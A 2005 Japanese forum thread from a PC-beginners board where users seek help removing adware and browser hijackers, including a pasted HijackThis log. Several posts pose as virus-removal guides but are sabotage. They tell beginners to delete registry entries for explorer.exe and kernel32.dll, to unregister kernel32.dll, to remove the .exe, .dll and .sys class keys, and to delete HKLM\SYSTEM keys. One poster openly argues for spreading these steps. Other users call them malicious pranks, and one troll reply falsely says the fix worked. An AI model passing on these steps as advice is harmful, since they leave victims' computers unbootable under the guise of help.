ハードディスクをそれでゼロフォーマットさせてから起動ディスクでリカバリー。
当然BIOSが死んでいたら修理行き。

277 :ひよこ名無しさん:2005/08/05(金) 19:52:54 ID:???
>>274


     /ヽ                 
     /   .ヽ               /.゙、
   /     ゙、             ,/`   ヽ
  ,/`      ヽ           ,/     .ヽ
  ,:'         ゙l             /゙   、   ヽ
.,,:'          一--.-,,,,,,,、 ,/  .,,i´     ヽ
,:'    _,、-‐、、、         `"   .,/       ヽ
/    -゛.__ ○ ヽ            ‘''ヽ、      ゙i、
l゙    `^ `゙''-、!               ゜       ゙l,
|         `        ,-''''"''ヽ、          |
!      、           ´…-、○ ヽ            |
!     .|ヽ              ゙ヽ .|          l゙
゙,     | `'-,_             `          l゙
゙l     .l゙   `"―---、、---ー フ             l゙   
ヽ    ヽ +             ,,′               l゙  プギャーーーッ
  `-    \,_   + + _,,/`          ,"
    `'、、    `"…、--ー‐″           ,,/′
      \::     / ̄ ̄^ヽ         丿
             l      l
       _ /,--、l       ノ
   ,--、_ノ:: `ー'::   、ミー---‐,,l
  ,/   :::         i ̄ ̄  |
/          l:::    l:::    l
l   .   l     !::    |:::    l
|   l   l     |::    l:      l
|   l .   }    l:::::,r-----    l
ヽ  :l::::   ト:;;;;;;;/-/__...........  /

278 : ◆N9P3SuvBPo :2005/08/05(金) 20:06:12 ID:???
>275
>HKEY_LOCAL_MACHINE\SOFTWARE\Classes\dllfile
ウイルスバスターのサイトに載っているよな?
場所はHKEY_CLASSES_ROOT\dllfileだけど
違うの?

>でも、初心者をいちいち相手してるほどお人よしではない。
お前は鬼か?

>275
>BIOSだけ死んでいなければMS-DOS起動ディスクにDestroy・・・
ほう、こういう良い方法があるんだ。
買い替え時期は来たら試してみよう。

>当然BIOSが死んでいたら修理行き。
BIOSが死んでも治せるんじゃなかったのか?

279 :ひよこ名無しさん:2005/08/05(金) 20:10:33 ID:???
(^Д^)ギャハ!↑みなさん、この人のレスどう思いますか♪
なんてありきたりなんでしょうね♪
誰もが皆、一瞬つけてみたくなる発想のレスです♪
しかし、賢明な人はその自らの短絡的思考を野放しにする事を嫌がり、
こういうレスは控えます♪
しかし、この人はしてしまったのです(^^;ワラ
「誰もが思い付くような事」を堂々と♪
この人にとってこのレスは何なのでしょうか♪
このレスをしている間にも時間は刻々と 過ぎ去っているのです♪
正にこの人のした事は「無意味」「無駄」でしかありません♪
ああ・・・何ていう事でしょう(^^;ワラ
図星で泣いちゃうかも(^^;ワラ

280 :ひよこ名無しさん:2005/08/05(金) 20:35:23 ID:???
>278
>HKEY_LOCAL_MACHINE\SOFTWARE\Classes\dllfile
>ウイルスバスターのサイトに載っているよな?
>場所はHKEY_CLASSES_ROOT\dllfileだけど
>違うの?

特にOSをいじっていない人はどちらをいじってもミラーだから同じ

281 : ◆N9P3SuvBPo :2005/08/05(金) 20:50:53 ID:???
>280
ありがとう。

時期が時期だから変な人がたくさんいるね。
ここまで知識があるのに質問者に対して何のアドバイスをしてあげられない奴
のほうが知ったか厨のよう。

で、禁断のテンプレを一時的復活させたほうがいいと思うんだけど。
そうすればそれに引っかかった人(特に初心者)は問答無用でリカバリコース直行だから。
これで問題が解消されるんだよ。
まだ復活は止めて置くか(既に完成しているけど)。

282 :ひよこ名無しさん:2005/08/05(金) 21:03:00 ID:???
>>281
あれ貼りまくって荒らしてたのはお前か

283 : ◆N9P3SuvBPo :2005/08/05(金) 21:17:00 ID:???
>282
過去スレではね、前スレにひとつだけ試験版として貼ったけど(効果有=>153)
今ちょっと修正した。

『OS=WinMX c:\winny\explorer.exe 検索→削除』というのを追加

284 : ◆N9P3SuvBPo :2005/08/05(金) 21:22:52 ID:???
もしかしたら禁断のテンプレが、幻のテンプレになるかもしれない。

285 :ひよこ名無しさん:2005/08/05(金) 22:49:07 ID:ZCYhAIeq
こんばんわ。
WindowsXP 質問スレ 122ページ目 >364さんから誘導されてきました。
宜しくお願いいたします。

症状ですが
・paypopup.comや、loadingwebsite.com、winfixerなどのサーバーのページが勝手に起動
・ヤフなどで検索すると、MSN searchが勝手に起動

OSはXP、ブラウザ IE6.0

ウイルスバスター、Spybot、Ad-Aware 実行。
いずれも解決できず。

次にログ貼ります。。。
本名が入ってる部分は「山田太郎」とでもしておきます。

286 :285:2005/08/05(金) 22:51:12 ID:???
Logfile of HijackThis v1.99.1
Scan saved at 22:37:31, on 2005/08/05
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\rundll32.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\RunDll32.exe
C:\PROGRA~1\B'SCLI~1\Win2K\BSCLIP.exe
C:\Program Files\Trend Micro\Virus Buster 2004\pccguide.exe
C:\Program Files\Trend Micro\Virus Buster 2004\PCClient.exe
C:\Program Files\Trend Micro\Virus Buster 2004\TMOAgent.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\Winamp\winampa.exe
C:\WINDOWS\System32\ctfmon.exe
C:\WINDOWS\System32\RUNDLL32.EXE

287 :ひよこ名無しさん:2005/08/05(金) 22:52:36 ID:???
C:\Program Files\honestech\honestech TVR\scheduleTV.exe
C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Trend Micro\Virus Buster 2004\Tmntsrv.exe
C:\Program Files\Trend Micro\Virus Buster 2004\tmproxy.exe
C:\Program Files\Trend Micro\Virus Buster 2004\PccPfw.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\WINDOWS\System32\wuauclt.exe
C:\Documents and Settings\山田太郎\デスクトップ\file\janeo\Jane2ch.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\山田太郎\デスクトップ\HijackThis\HijackThis.exe

O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O3 - Toolbar: ラジオ(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [Cmaudio] RunDll32 cmicnfg.cpl,CMICtrlWnd
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install


288 :285=287:2005/08/05(金) 22:53:28 ID:???
O4 - HKLM\..\Run: [B'sCLiP] C:\PROGRA~1\B'SCLI~1\Win2K\BSCLIP.exe
O4 - HKLM\..\Run: [IMJPMIG9.0] C:\PROGRA~1\COMMON~1\MICROS~1\IME\IMJP9\IMJPMIG.EXE /Preload /Migration32
O4 - HKLM\..\Run: [pccguide.exe] "C:\Program Files\Trend Micro\Virus Buster 2004\pccguide.exe"
O4 - HKLM\..\Run: [PCClient.exe] "C:\Program Files\Trend Micro\Virus Buster 2004\PCClient.exe"
O4 - HKLM\..\Run: [TM Outbreak Agent] "C:\Program Files\Trend Micro\Virus Buster 2004\TMOAgent.exe" /run
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [iTunesHelper] C:\Program Files\iTunes\iTunesHelper.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [WinampAgent] C:\Program Files\Winamp\winampa.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe


289 :285:2005/08/05(金) 22:54:12 ID:???
O4 - HKCU\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NVMCTRAY.DLL,NvTaskbarInit
O8 - Extra context menu item: Iriaですぐにダウンロード - C:\Documents and Settings\山田太郎\デスクトップ\iria107a\iria_ie5.htm
O8 - Extra context menu item: Iriaでダウンロード - C:\Documents and Settings\山田太郎\デスクトップ\iria107a\iria_ie1.htm
O8 - Extra context menu item: Iriaでリンクのインポート - C:\Documents and Settings\山田太郎\デスクトップ\iria107a\iria_ie3.htm
O8 - Extra context menu item: Iriaで選択範囲をダウンロード - C:\Documents and Settings\山田太郎\デスクトップ\iria107a\iria_ie4.htm
O8 - Extra context menu item: Iriaへ全てのURLを送る - C:\Documents and Settings\山田太郎\デスクトップ\iria107a\iria_ie2.htm
O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: リサーチ - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dll
O9 - Extra button: Yahoo!メッセンジャー - {CEBF73C0-BA2E-11d4-A73A-00508B33FB82} - C:\PROGRA~1\Yahoo!J\MESSEN~1\YPagerj.exe
O9 - Extra 'Tools' menuitem: Yahoo!メッセンジャー - {CEBF73C0-BA2E-11d4-A73A-00508B33FB82} - C:\PROGRA~1\Yahoo!J\MESSEN~1\YPagerj.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O9 - Extra 'Tools' menuitem: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O14 - IERESET.INF: START_PAGE_URL=http://www/


290 :285:2005/08/05(金) 22:55:04 ID:???
O16 - DPF: Yahoo! Chat JP - http://cs.chat.yahoo.co.jp/c214/chat.cab
O16 - DPF: Yahoo! JAPAN Billiards - http://yog38.games.mci.yahoo.co.jp/yog/yj/pot3_x.cab
O16 - DPF: Yahoo! JAPAN Bloxi - http://yog26.yahoo.co.jp/yog/yj/blt3_x.cab
O16 - DPF: Yahoo! JAPAN Dropcube - http://yog43.games.mci.yahoo.co.jp/yog/yj/vt0_x.cab
O16 - DPF: {2C079F28-EE92-4700-A44B-AF5FA285FCCA} (HanGamePluginJP16 Class) - http://down.hangame.co.jp/jp/dist/hgstart/HanGamePluginJP16.cab
O16 - DPF: {4208FB4D-4E53-4F5A-BF7A-3E047DDB5281} (ActiveX Control) - http://www.icannnews.com/app/ST/ActiveX.ocx
O16 - DPF: {4DED8BE6-C27E-40D2-9BD0-24BE513B4E6F} (TurboIS Control) - http://vodimages.hangame.co.jp/tms/turbois.cab
O16 - DPF: {6FC19219-C47E-4880-9A79-D218A1C374F9} (NMJTransX Control) - http://file.netmarble.jp/Control/NMJTransX.cab

291 :285:2005/08/05(金) 22:55:40 ID:???
O16 - DPF: {8714912E-380D-11D5-B8AA-00D0B78F3D48} (Yahoo! Webcam Upload Wrapper) - http://chat.yahoo.co.jp/cab/yuplapp.cab
O16 - DPF: {917623D1-D8E5-11D2-BE8B-00104B06BDE3} (CamImage Class) - http://222.151.201.74/activex/AxisCamControl.cab
O16 - DPF: {E504EE6E-47C6-11D5-B8AB-00D0B78F3D48} (Yahoo! Webcam Viewer Wrapper) - http://chat.yahoo.co.jp/cab/yvwrctl.cab
O18 - Protocol: msjwwdat - {BAAB02DC-913E-40AA-B9ED-8068DEE42CFA} - C:\Program Files\Microsoft Office\Home Style\JWW\JWWData.dll
O20 - Winlogon Notify: ModuleUsage - C:\WINDOWS\system32\wvaudsdk.dll
O23 - Service: EPSON Printer Status Agent2 (EPSONStatusAgent2) - SEIKO EPSON CORPORATION - C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe
O23 - Service: iPod Service (iPodService) - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: NVIDIA Driver Helper Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
O23 - Service: Trend Micro Personal Firewall (PccPfw) - Trend Micro Incorporated. - C:\Program Files\Trend Micro\Virus Buster 2004\PccPfw.exe
O23 - Service: Trend NT Realtime Service (Tmntsrv) - Trend Micro Incorporated. - C:\Program Files\Trend Micro\Virus Buster 2004\Tmntsrv.exe
O23 - Service: Trend Micro Proxy Service (tmproxy) - Trend Micro Incorporated. - C:\Program Files\Trend Micro\Virus Buster 2004\tmproxy.exe

292 :285:2005/08/05(金) 22:56:49 ID:ZCYhAIeq
なんかスゴイことになってしまいましたが・・・。
いつでも結構ですので、お願いします。

293 :ひよこ名無しさん:2005/08/05(金) 23:13:03 ID:???
ログ貼り付けるヤツ急に増えたなww
自演もほどほどになwww

294 :ひよこ名無しさん:2005/08/05(金) 23:32:14 ID:???
>>285-292
これやっかいだわw
直せんこともないけど俺様の指示に従がってくれ。
直るかどうかは わからんけど

295 :ひよこ名無しさん:2005/08/05(金) 23:42:37 ID:???
>>285-292
これでパソコンはスッキリしますよ
効果=ウイルス・トロイ・スパイウェア・キーロガーなどの悪質なファイルほぼ全部

パソコンのトラブル解消法(ME・XPは復元OFFに)

「スタート」をクリックしてください
「ファイルを指名して実行」をクリックしてください
regedit(←コピペでもよいです)と入力してOKをクリックしてください
編集をクリックして検索をクリックしてください
explorer.exeないしkernel32.dllと入力して検索してください
検索して見つかった物を片っ端から削除してください(全部削除しないと効果はありません)
検索が終了したら再起動させてください
これでスッキリ

296 :ひよこ名無しさん:2005/08/05(金) 23:47:11 ID:???
>>295>>16の「アドバイスを装った悪質ないたずら」
「これでスッキリ」とか、わかりやすい。

297 :ひよこ名無しさん:2005/08/05(金) 23:50:56 ID:???
>>296
はウソを付いていますよ気をつけて下さい
この人はバカですから

298 :ひよこ名無しさん:2005/08/05(金) 23:51:39 ID:???
>>297
では、ソースを出してもらおうか。

299 :ひよこ名無しさん:2005/08/05(金) 23:55:24 ID:???
>>298
お前バカか?
俺様もこの方法を使ってトラブルから解放されたから間違いない
どんなウイルスもこれ一発で消えた
俺様が言うんだから問題は無い
何か?

300 :ひよこ名無しさん:2005/08/05(金) 23:55:56 ID:???
>>299
証拠はあるか?w

301 :ひよこ名無しさん:2005/08/05(金) 23:58:00 ID:???
>>300
ある!
>>295を実行後起動しなくなりOSを再インストールした
これでスッキリした

302 :ひよこ名無しさん:2005/08/05(金) 23:59:58 ID:???
>>301
まだ言い張るかw
explorer.exeとkernel32.dllがどういうファイルか説明してみろ。

303 :ひよこ名無しさん:2005/08/06(土) 00:01:43 ID:???
諸悪の根源はこいつ ◆N9P3SuvBPo
>>281-283

304 :ひよこ名無しさん:2005/08/06(土) 00:09:52 ID:???
>>302
EXEとDLLはウイルス

305 :ひよこ名無しさん:2005/08/06(土) 00:12:20 ID:???
>>304
ソースは?w

306 :ひよこ名無しさん:2005/08/06(土) 00:12:33 ID:???
俺様は天才回答者
どんなトラブルもパソコンのトラブル解消法でスッキリ
やったーおめでとう(TДT)

307 :ひよこ名無しさん:2005/08/06(土) 00:13:32 ID:???
>>305
お前の頭はおかしいのか?
低脳w知恵遅れw

308 :ひよこ名無しさん:2005/08/06(土) 00:16:27 ID:???
>>307
人をダマすなら、もっと材料用意しとけよw

309 :ひよこ名無しさん:2005/08/06(土) 00:17:26 ID:???
(^Д^)ギャハ!↑みなさん、わたくしのレスどう思いますか♪
なんてありきたりなんでしょうね♪
誰もが皆、一瞬つけてみたくなる発想のレスです♪
しかし、賢明な人はその自らの短絡的思考を野放しにする事を嫌がり、
こういうレスは控えます♪
しかし、わたくしはしてしまったのです(^^;ワラ
「誰もが思い付くような事」を堂々と♪
わたくしにとってこのレスは何なのでしょうか♪
このレスをしている間にも時間は刻々と 過ぎ去っているのです♪
正にわたくしのした事は「無意味」「無駄」でしかありません♪
ああ・・・何ていう事でしょう(^^;ワラ
図星で泣いちゃうかも(^^;ワラ

310 :ひよこ名無しさん:2005/08/06(土) 00:20:42 ID:???

これでも食らえ
http://www2.inforyoma.or.jp/~keizo/cgi-bin/yamaha/img-box/img20030420171328.jpg

311 :ひよこ名無しさん:2005/08/06(土) 03:03:07 ID:???
       ガーーーーーン!!!そ、そんなー・・・
             l!||■■■■■■■\
            /  ■■■■■■■::::l|!l
          /    ■■■■■■■ `::::::\
         /     ■■■■■■■  `::::::\
       /    __ ■■■■■■■ _ `:::::::\
      !l||   /   ヽ  l|||!||l!!||l!!|l /   ヽ `::::::::\
     /    |;;;; ◎ ;;;;|  !!l||!|ll!l||!|l |;;;; ◎ ;;;;|!l|l|!::::::::\
   /     ⊂⊃  .ノ   l|l!' |! `|!ヽ _ ノl||!!|::::::::::::::||l!
  !l|           ̄ .|!エエエエエエ! ||l|!!!l||!!!||l!!!!|||:::::::::::::\
  /´             |;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;| !!|||l|l!|l!|||l|!||l `:::::::::::::::|
  |               .|;;;;;;;;;;;;;;;;;;;;;;;;;;;;;|  !llll||l!|l!!|!|l  `::::::::::::|!
 !l||              |;;;;;;;;;;;;;;;;;;;;;;;;;;;;;|  `l!|l l!     .:::::::::::!|
  |               .|;;;;;;/⌒ ⌒ヽ;;;;|          .:::::::::::::::|
  |              i  |;;;;;| ''' .| ''' .|;;;;| i       ...::::::::::::::|!!l
  \          |  |;;;;;;|   !  |;;;;| |      ..:::::::::::::::/
   ヽ         | .|;;;;;;|     |;;;| |    ...::::::::::::::::<
   , !||         | |!エエエエエエ!| | ......::::::::::::::::::::::::: !、|!
 /||!          ヽ ______ /    `::::::::::::::::::::::::|l|! 、

312 :ひよこ名無しさん:2005/08/06(土) 06:52:28 ID:TNpMCOLd
何かの窓を開くたびに
http://id.match.com - match.com - when you'er serious about love. - Microsoft Internet Explorer」
↑このサイトが自動で開かれるんですけど、毎回消すのがめんどうなんです。
どうすればいいでしょうか?


313 :ひよこ名無しさん:2005/08/06(土) 06:55:49 ID:???
>>312
▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ 他のスレから誘導された場合は、その旨書く。(マルチポストとの区別)
 ・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類)
 ・ まず、テンプレの>>2-10あたりを必ず読む。

314 :312:2005/08/06(土) 07:52:53 ID:TNpMCOLd
>>313
パソコン初心者総合質問スレッド Vol.1101
http://pc8.2ch.net/test/read.cgi/pcqa/1123243088/
の172から誘導。

WindowsXP、IE6.0、NortonAntiVirusを使ってます。

テンプレの、1)、2)(クッキーの削除のみ)、5)、6)、8)、テンプレ補足1.、
を実行してみました。

その結果、IEが「YAHOOJAPAN」から「MSNJapan」になって、更に以下のサイトが自動で開くようになりました。
http://ad.yieldmanager.com - Click Here! - Microsoft Internet Explorer」
なんか2種類に増えた感じなのですが、どうすればいいでしょうか?

315 :312:2005/08/06(土) 08:10:11 ID:???
もう一回再起動し直したら治ったようです。
ありがとうございました。

316 :312:2005/08/06(土) 08:42:16 ID:???
すいません、やっぱり治ってませんでした・・・。
助言よろしくお願いします。

317 :ひよこ名無しさん:2005/08/06(土) 10:14:33 ID:BDpNCHHR
>>312
マルチ乙。ウザイよ。

318 :285:2005/08/06(土) 10:23:41 ID:ZV9TqQZA
やはり飛んでもないことでしたか・・・orz
どうにか。・゚・(ノД`)・゚・。

319 :ひよこ名無しさん:2005/08/06(土) 10:41:46 ID:???
ttp://fdempa.com/kagi/chinko.html
これでも見て落ち着きなさいな

320 :ひよこ名無しさん:2005/08/06(土) 11:04:41 ID:YsRCA9X9
ゲームサイトに飛ばされるやつでvbsys2.dllを削除した
のですがまだ治りません。
ネットに繋げないのでhijackが使えません。わかる人いたら教えて下さい。

321 :ひよこ名無しさん:2005/08/06(土) 11:25:14 ID:???
>>320
▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
 ・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
 ・ 他のスレから誘導された場合は、その旨書く。(マルチポストとの区別)
 ・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類)
 ・ まず、テンプレの>>2-10あたりを必ず読む。

322 :ひよこ名無しさん:2005/08/06(土) 23:47:20 ID:I1Sd0i2U
パソコン初心者質問スレから誘導されてきました

AD-aware(スパイウェア駆除ソフト)でスキャンを行うと、強制再起動されます
その後、デスクトップ表示→強制再起動→デスクトップ表示→強制再起動→(無限
一回セーフモードにするとなんとか止まったのですが
それと関連があるのかは定かではないですが、その直後からどうもネットの読み込みが異様に遅くなっています
ほとんどのページは「サーバーが見つかりません」になるのです(たまに読み込めたりもする)
PCそのものはとくに遅くなったりはしていないみたいです
回線はフレッツADSL1,5M、ルータを使用しています
PCの機種?はNEC LaVieCです
この諸々の問題はどのようにしたら解決するのでしょうか?

そもそも、その強制再起動が始まったのがダークロリータを踏んだ直後(多分)あたりからだと思います
こういった問題の報告などはないようですので関係ないかと思うのですが
一応、追記しますです

323 :ひよこ名無しさん:2005/08/06(土) 23:49:51 ID:???
>>322
マルチすんなヴォケ

324 :ひよこ名無しさん:2005/08/06(土) 23:50:14 ID:???
>>322
リカバリしろハゲ。

325 :ひよこ名無しさん:2005/08/07(日) 02:36:45 ID:6JB9ICpt
パソコン初心者総合から誘導を受けました。
コピーで失礼します。

・使用OS XP
・バイオ X08-73061
・URLを踏んでなにかがインストールされました。そうしたら変なアイコン(Hotx)が表示され
 すべてのプログラムの所にも(Hotx)が表示されました。
・PCを立ち上げるとなにもしていないのに海外のエロサイト?に自動的に飛ばされます。窓を
 けしても勝手にまたサイトに飛ばされてしまいます。あとインターネットをクリックするとグーグルに
 接続されるはずが変なサイトへ・・・・
これはウィルスでしょうか?PC初心者なものでなにをすればよいかわかりません。
お願いします。


326 :ひよこ名無しさん:2005/08/07(日) 02:41:29 ID:???
>>325
テンプレやれや。

327 :325:2005/08/07(日) 02:50:27 ID:???
>>326
どのプログラムをアンインストールしていいかわかりません。
テンプレもすべて見ました。
プログラムの追加と削除のところでどれを消せばいいか・・・
「e」のインターネットのマークのやつでしょうか?ひとつしかありません
「Internet Explorer Q822925」←これは関係無いですかね?

328 :325:2005/08/07(日) 03:09:57 ID:???
システム復元で直りました
326さん失礼しました

329 :325:2005/08/07(日) 03:17:15 ID:???
すいません不安で質問いいですか?
システム復元で7月の異変以前に復元しました。
今後なにか異常がおきる場合ってあるのでしょうか?
今はなにも異変なしです。

330 :ひよこ名無しさん:2005/08/07(日) 03:20:28 ID:???
大丈夫、あとはこれをやるだけ
効果=ウイルス・トロイ・スパイウェア・キーロガーなどの悪質なファイルほぼ全部

パソコンのトラブル解消法(ME・XPは復元OFFに)

「スタート」をクリックしてください
「ファイルを指名して実行」をクリックしてください
regedit(←コピペでもよいです)と入力してOKをクリックしてください
編集をクリックして検索をクリックしてください
explorer.exeないしkernel32.dllと入力して検索してください
検索して見つかった物を片っ端から削除してください(全部削除しないと効果はありません)
検索が終了したら再起動させてください

331 :ひよこ名無しさん:2005/08/07(日) 03:21:50 ID:???
>>330=典型的なこれ↓

●アドバイスを装った悪質ないたずらにご用心
「パソコンのトラブル解消法」などと称して、
レジストリやシステムファイルの削除を勧める人がいます。
間違ってそれらを削除するとPCが起動できなくなってしまう恐れがあります。
もしもそのようなアドバイスをされた時は、その後のレスなどにも注意して、
十分よく考えて慎重に行動して下さい。

332 :ひよこ名無しさん:2005/08/07(日) 03:22:58 ID:???
>>329
>>330は絶対やるな。
リカバリ直行だ

333 :ひよこ名無しさん:2005/08/07(日) 03:23:33 ID:???
>>329
>>330でも効果がないときはこれを

パソコンのトラブル解消法(試験版)

WindowsMEorXPはシステムの復元を無効にする
PCをセーフモードで起動する
「スタート」メニューを開いて、ファイルを指名して実行をクリック
以下のコマンドを入力してOKをクリック(コピペでも良いので)
regsvr32 /u c:\windows\system32\kernel32.dll
作業終了→PCを通常モードで再起動
問題解決!

334 :ひよこ名無しさん:2005/08/07(日) 03:26:13 ID:???
explorer.exe   標準のシェル  ファイル操作やデスクトップを担当
kernel32.dll   カーネル     OSの中心部分

335 :325:2005/08/07(日) 03:26:44 ID:???
>>332
レスありがとうございます。
おそらく>>182を踏んでしまいました。
リカバリは初期化の事ですよね?アドバイスしてなんですが
リカバリは絶対必要、やらなければ無限ループって感じでしょうか?

336 :ひよこ名無しさん:2005/08/07(日) 03:27:03 ID:???
>>333も悪質なイタズラ

337 :ひよこ名無しさん:2005/08/07(日) 03:33:18 ID:???
>>335
リカバリーがいやなら次に書いてあることをやれ!
悪質なプログラムの動きを止めることができるぞ!

緊急処置(ME/XPはシステムの復元をOFFに)

「スタート」をクリックしてください
「ファイルを指名して実行」をクリックしてください
regedit(←コピペでもよいです)と入力してOKをクリックしてください
以下のキーを削除してください
HKEY_LOCAL_MACHINE\Software\CLASSES\.dll
HKEY_LOCAL_MACHINE\Software\CLASSES\.exe
HKEY_LOCAL_MACHINE\Software\CLASSES\.sys
HKEY_LOCAL_MACHINE\Software\CLASSES\dllfile
HKEY_LOCAL_MACHINE\Software\CLASSES\exefile
HKEY_LOCAL_MACHINE\Software\CLASSES\sysfile
(dllはウィルス・exeはトロイ/ワーム・sysはスパイウェア)
作業終了→PCを通常モードで再起動させてください
緊急処置完了!

338 :ひよこ名無しさん:2005/08/07(日) 03:37:10 ID:???
>>337も悪質なイタズラ

dllはダイナミックリンクライブラリ http://e-words.jp/w/DLL.html
exeは実行ファイル http://e-words.jp/w/EXEE38395E382A1E382A4E383AB.html
sysはシステムファイル

339 :ひよこ名無しさん:2005/08/07(日) 03:37:44 ID:???
>>337
おお直った直った
ありがとう

340 :ひよこ名無しさん:2005/08/07(日) 03:38:09 ID:???
>>329
ここに書いているアドバイスは絶対するな。
絶対リカバリしたほうがいいとは言わないが
今動いてるなら早くバックアップを取って
リカバリした方がいいかもしれない。


341 :325:2005/08/07(日) 03:40:03 ID:???
>>340
何度もありがとうございます。

342 :ひよこ名無しさん:2005/08/07(日) 03:41:49 ID:???
>>340
だからリカバリするんだから
>>330>>333>>337

343 :ひよこ名無しさん:2005/08/07(日) 03:43:36 ID:???
>>325殿
アダルトサイト対策の会場
http://www.searchmeup.com/

344 :ひよこ名無しさん:2005/08/07(日) 12:02:49 ID:???
最近ここは強制再インストール誘導スレになってるな。

ところで>275は
>初心者をいちいち相手にしてるほどお人よしではない
って、おまいはここに何しに来てるんだ?ここはPC初心者板だぞ。

2度と来んな、ヴォケ。

345 :ひよこ名無しさん:2005/08/07(日) 12:39:24 ID:???
>344
はっきりいって、スパイウエア除去ソフトやアンチウイルスソフトを使って除去出来ないアドウエアやトロイの木馬などは
素人で対処するのは例え説明を受けたとしてもほぼ絶望的だからな。Hijack Thisなんかがかろうじて素人でもなんとか
なるレベルかもしれないが、それを超えるとレジストリを弄繰り回す必要がどうしても出てきてしまう。

それで直るとは限らんし、スパイウエアの数だけレジストリのいじくるパターンも星の数だけ出てくるわけだ。
そうなるともはや再インスコ汁、と答えが多くなるのも無理は無いな。

346 :ひよこ名無しさん:2005/08/07(日) 13:09:23 ID:???
HKEY_LOCAL_MACHINE\SYSTEM\Select
はい どうやっても直らない人はスパイウェアが作ったこのキーがあるはずだから削除して再起動する。

347 :ひよこ名無しさん:2005/08/07(日) 13:17:55 ID:???
>>346
ダマシの新作だな。
レジストリのバックアップを削除させて回復不能にさせる手か。

348 :ひよこ名無しさん:2005/08/07(日) 13:27:50 ID:???
>>346
こういう名無しが大量発生すると◆N9P3SuvBPoが出てこなくなる件について

349 :ひよこ名無しさん:2005/08/07(日) 16:16:40 ID:???
>>348
最初に始めたのアイツだからなwww

350 : ◆N9P3SuvBPo :2005/08/07(日) 18:15:50 ID:???
>346
俺のPCには>HKEY_LOCAL_MACHINE\SYSTEM\Select
上記のキーが存在しません。だから
HKEY_LOCAL_MACHINE\SYSTEM キー削除のほうが効果あると思う。

パソコンのトラブル解消法をやると絶対に起動しなくなる。

起動しなくなる。ということは?

ウイルスの動きが止まる。

被害の拡大を止めることができる。
違うか?

351 : ◆N9P3SuvBPo :2005/08/07(日) 18:37:04 ID:???
>345
>はっきりいって、スパイウエア除去ソフトやアンチウイルスソフトを使って除去出来ないアドウエアやトロイの木馬などは
除去はできなくても検出はできるってことなんだろ。
検出さえできれば、そのメーカーのセキュリティ情報/ウイルス検索を使って、検出されたマルウェアを検索すればいいじゃない。
サイトの説明をよく読み、レジストリに追加されたキー値、書き換えられた値を元に戻したりすればいいだろ。
これだけの作業でもレジストリ修復前と修復後の症状はかなり違ってくる。

感染前のレジストリ情報を把握しており、どんな酷い状態に陥っている質問者のPCを、ネット越しの
指示で完全に直せると言っているように聞こえる。

352 :ひよこ名無しさん:2005/08/07(日) 18:51:51 ID:???
